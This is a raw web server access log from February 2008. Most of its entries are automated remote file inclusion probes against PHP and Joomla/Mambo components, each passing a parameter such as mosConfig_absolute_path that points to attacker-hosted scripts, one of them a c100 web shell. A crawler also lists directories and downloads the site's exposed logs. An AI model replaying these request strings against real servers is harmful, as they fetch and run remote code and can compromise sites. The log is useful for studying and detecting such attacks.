82.146.33.210 - - [25/Feb/2008:08:39:58 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
66.179.181.191 - - [25/Feb/2008:08:41:28 -0800] "GET //?mosConfig_absolute_path=http://www.upload2world.com/pic76/upload2world_e439c.gif?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.65" "www.dmulk.com"
72.30.216.107 - - [25/Feb/2008:08:41:31 -0800] "GET /logs/access.log HTTP/1.0" 200 325438 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.213.30 - - [25/Feb/2008:08:41:45 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.213.30 - - [25/Feb/2008:08:41:46 -0800] "GET /minamijewelry/?D=A HTTP/1.0" 200 2094 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
66.98.144.78 - - [25/Feb/2008:08:41:48 -0800] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://www.spices.res.in/biotraineeship.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:08:42:00 -0800] "GET /administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:08:42:00 -0800] "GET /logs/administrator/components/com_mosmedia/includes/credits.html.php?mosConfig_absolute_path=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:42:15 -0800] "GET /logs/access_080117.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:42:16 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:08:42:21 -0800] "GET /logs/access.log/doceboCms/class/class.dashboard_cms.php?where_framework=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:08:42:21 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.193.228.173 - - [25/Feb/2008:08:42:22 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://madbox.ru/administrator/components/com_smf/includes/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:08:42:51 -0800] "GET /logs/m2f/m2f_phpbb204.php?m2f_root_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
211.234.116.170 - - [25/Feb/2008:08:42:51 -0800] "GET /m2f/m2f_phpbb204.php?m2f_root_path=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:42:53 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:42:54 -0800] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:42:54 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:42:55 -0800] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:42:55 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:42:56 -0800] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:44:41 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:44:42 -0800] "GET /logs/access_080108.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:44:44 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:44:44 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:44:51 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:45:25 -0800] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.26.137.64 - - [25/Feb/2008:08:45:36 -0800] "GET /logs/access_080211.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.ar-vision.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:08:45:38 -0800] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:08:45:39 -0800] "GET /logs/access.log/phpsecurityadmin/include/logout.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
62.75.193.193 - - [25/Feb/2008:08:45:39 -0800] "GET //vwar/includes/get_header.php?vwar_root=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
200.206.143.90 - - [25/Feb/2008:08:45:40 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [25/Feb/2008:08:45:42 -0800] "GET //skin/zero_vote/error.php?dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
200.206.143.90 - - [25/Feb/2008:08:45:44 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.fgwarez.com/bbs/skin/ting_music/.../usa?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:46:00 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.168.15.147 - - [25/Feb/2008:08:46:00 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.154 - - [25/Feb/2008:08:46:08 -0800] "GET /megumi/?S=D HTTP/1.0" 200 921 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.190.12 - - [25/Feb/2008:08:46:09 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:46:45 -0800] "GET //skin/zero_vote/admin.php?dir=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
211.233.19.105 - - [25/Feb/2008:08:46:45 -0800] "GET /logs//skin/zero_vote/admin.php?dir=http://www.geocities.com/ntchack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:46:47 -0800] "GET /logs/access_080211.log//modules/vwar/admin/admin.php?vwar_root=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:46:47 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:46:47 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:06 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:06 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:06 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:07 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:53 -0800] "GET /logs/access_080117.log//login.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:53 -0800] "GET //login.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:53 -0800] "GET /logs//login.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:47:55 -0800] "GET /logs/access_080211.log//login.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:48:10 -0800] "GET /logs/access_080117.log//modules/vwar/admin/admin.php?vwar_root=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:42 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:43 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:44 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:48 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:48 -0800] "GET / HTTP/1.1" 200 3094 "-" "Java/1.6.0_03" "dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:48 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:48 -0800] "GET /?D=A HTTP/1.1" 200 3094 "-" "Java/1.6.0_03" "dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:49 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:49 -0800] "GET /_private HTTP/1.1" 301 89 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:49 -0800] "GET /_private/ HTTP/1.1" 403 163 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:49 -0800] "GET /backup HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:50 -0800] "GET /backup2 HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:50 -0800] "GET /bikes HTTP/1.1" 301 86 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:51 -0800] "GET /bikes/ HTTP/1.1" 200 2184 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:55 -0800] "GET /drop HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:55 -0800] "GET /funny HTTP/1.1" 301 86 "-" "Java/1.6.0_03" "dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:57 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:58 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:58 -0800] "GET /funny/ HTTP/1.1" 200 808 "-" "Java/1.6.0_03" "dmulk.com"
89.108.91.215 - - [25/Feb/2008:08:49:58 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.geocities.com/rha.mutzz/file/body.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:49:59 -0800] "GET /hms HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:02 -0800] "GET /imperant HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:03 -0800] "GET /logs HTTP/1.1" 301 85 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:03 -0800] "GET /logs/ HTTP/1.1" 200 36116 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:07 -0800] "GET /megumi HTTP/1.1" 301 87 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:07 -0800] "GET /megumi/ HTTP/1.1" 200 937 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:09 -0800] "GET /minamijewelry HTTP/1.1" 301 94 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:09 -0800] "GET /minamijewelry/ HTTP/1.1" 200 2110 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:10 -0800] "GET /mobilehackers HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:11 -0800] "GET /mobileoffice HTTP/1.1" 301 93 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:12 -0800] "GET /mobileoffice/ HTTP/1.1" 200 5024 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:13 -0800] "GET /plans HTTP/1.1" 301 86 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:15 -0800] "GET /plans/ HTTP/1.1" 200 974 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:16 -0800] "GET /presto HTTP/1.1" 301 87 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:16 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:18 -0800] "GET /retreat1 HTTP/1.1" 301 89 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:21 -0800] "GET /retreat1/ HTTP/1.1" 200 15081 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:22 -0800] "GET /tmp HTTP/1.1" 301 84 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:23 -0800] "GET /tmp/ HTTP/1.1" 200 1673 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:24 -0800] "GET /tools HTTP/1.1" 301 86 "-" "Java/1.6.0_03" "dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:50:28 -0800] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:50:29 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:34 -0800] "GET /tools/ HTTP/1.1" 200 12400 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:35 -0800] "GET /warboard HTTP/1.1" 401 395 "-" "Java/1.6.0_03" "dmulk.com"
82.146.33.210 - - [25/Feb/2008:08:50:37 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
82.146.33.210 - - [25/Feb/2008:08:50:37 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:50:50 -0800] "GET /funny/Mencanmultitask.asx HTTP/1.1" 200 393216 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:06 -0800] "GET /funny/terryt1.wmv HTTP/1.1" 200 393216 "-" "Java/1.6.0_03" "dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:51:08 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:51:09 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.185.237.143 - - [25/Feb/2008:08:51:09 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:12 -0800] "GET /logs/access.log HTTP/1.1" 200 344889 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:15 -0800] "GET /logs/access_070624.log HTTP/1.1" 200 110201 "-" "Java/1.6.0_03" "dmulk.com"
62.24.251.240 - - [25/Feb/2008:08:51:18 -0800] "GET /logs/access_080211.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.3y3h4ck.org.uk/shells/c100.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:23 -0800] "GET /logs/access_070625.log HTTP/1.1" 200 28817 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:27 -0800] "GET /logs/access_070626.log HTTP/1.1" 200 32190 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:29 -0800] "GET /logs/access_070627.log HTTP/1.1" 200 163174 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:37 -0800] "GET /logs/access_070628.log HTTP/1.1" 200 28980 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:39 -0800] "GET /logs/access_070629.log HTTP/1.1" 200 29210 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:42 -0800] "GET /logs/access_070630.log HTTP/1.1" 200 36187 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:45 -0800] "GET /logs/access_070701.log HTTP/1.1" 200 48497 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:49 -0800] "GET /logs/access_070702.log HTTP/1.1" 200 2893 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:49 -0800] "GET /logs/access_070703.log HTTP/1.1" 200 22875 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:51 -0800] "GET /logs/access_070704.log HTTP/1.1" 200 11515 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:52 -0800] "GET /logs/access_070705.log HTTP/1.1" 200 50888 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:51:57 -0800] "GET /logs/access_070706.log HTTP/1.1" 200 26632 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:00 -0800] "GET /logs/access_070707.log HTTP/1.1" 200 48967 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:03 -0800] "GET /logs/access_070708.log HTTP/1.1" 200 169855 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:12 -0800] "GET /logs/access_070709.log HTTP/1.1" 200 30963 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:14 -0800] "GET /logs/access_070710.log HTTP/1.1" 200 32027 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:20 -0800] "GET /logs/access_070711.log HTTP/1.1" 200 43580 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:23 -0800] "GET /logs/access_070712.log HTTP/1.1" 200 114624 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:29 -0800] "GET /logs/access_070713.log HTTP/1.1" 200 67092 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:33 -0800] "GET /logs/access_070714.log HTTP/1.1" 200 51386 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:37 -0800] "GET /logs/access_070715.log HTTP/1.1" 200 115427 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:47 -0800] "GET /logs/access_070716.log HTTP/1.1" 200 34661 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:51 -0800] "GET /logs/access_070717.log HTTP/1.1" 200 2718 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:52 -0800] "GET /logs/access_070718.log HTTP/1.1" 200 45557 "-" "Java/1.6.0_03" "dmulk.com"
217.147.236.10 - - [25/Feb/2008:08:52:53 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.147.236.10 - - [25/Feb/2008:08:52:54 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://gcd.jveuger.nl/site/templates/waterandstone800/css.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:56 -0800] "GET /logs/access_070719.log HTTP/1.1" 200 50682 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:52:58 -0800] "GET /logs/access_070720.log HTTP/1.1" 200 29646 "-" "Java/1.6.0_03" "dmulk.com"
77.248.79.12 - - [25/Feb/2008:08:53:01 -0800] "GET /logs/access_070721.log HTTP/1.1" 200 23814 "-" "Java/1.6.0_03" "dmulk.com"
